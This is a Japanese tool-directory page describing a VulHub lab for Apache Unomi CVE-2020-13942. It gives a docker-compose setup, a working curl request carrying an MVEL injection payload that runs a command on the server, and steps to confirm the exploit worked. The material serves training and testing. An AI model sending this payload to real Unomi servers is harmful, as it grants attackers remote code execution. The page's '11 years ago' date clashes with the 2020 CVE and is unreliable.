Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-13942byVulHub — Apache Unomi CVE-2020-13942 に対するステップバイステップのラボ環境とエクスプロイト。MVEL 式言語インジェクションがリモートコード実行に至ることを実証します。 | Kitploit
ツール/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Apache Unomi CVE-2020-13942 に対するステップバイステップのラボ環境とエクスプロイト。MVEL 式言語インジェクションがリモートコード実行に至ることを実証します。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-13942byVulHub


Apache Unomi Expression Language Injection RCE (CVE-2020-13942)

説明

この脆弱性は、MVEL式言語インジェクションを悪用して、Apache Unomi バージョン 1.5.1 を実行しているシステム上で任意のコマンド実行を可能にします。

プロジェクトページ

GitHub - Vulhub - Unomi CVE-2020-13942


環境設定

Docker Compose ファイル (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

コンテナの起動

以下のコマンドでコンテナを実行します:

root@kitploit:~
docker compose up -d

エクスプロイトの実行

Kali から実行するコマンド

curl を使用して以下の POST リクエストを送信します:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

エクスプロイトの確認

コンテナへのアクセス

ファイル作成を確認するためにコンテナにアクセスします:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

結果の確認

pluto フォルダの存在を確認します:

root@kitploit:~
hsperfdata_root  pluto

pluto ファイルが存在する場合、エクスプロイトが成功したことを意味します。


セキュリティに関する注意

この脆弱性は任意のコマンド実行を可能にします。これらのテストは、管理された環境でのみ、学習または検証目的で使用してください。許可されていない環境で脆弱性を悪用することは違法です。

ツールをダウンロード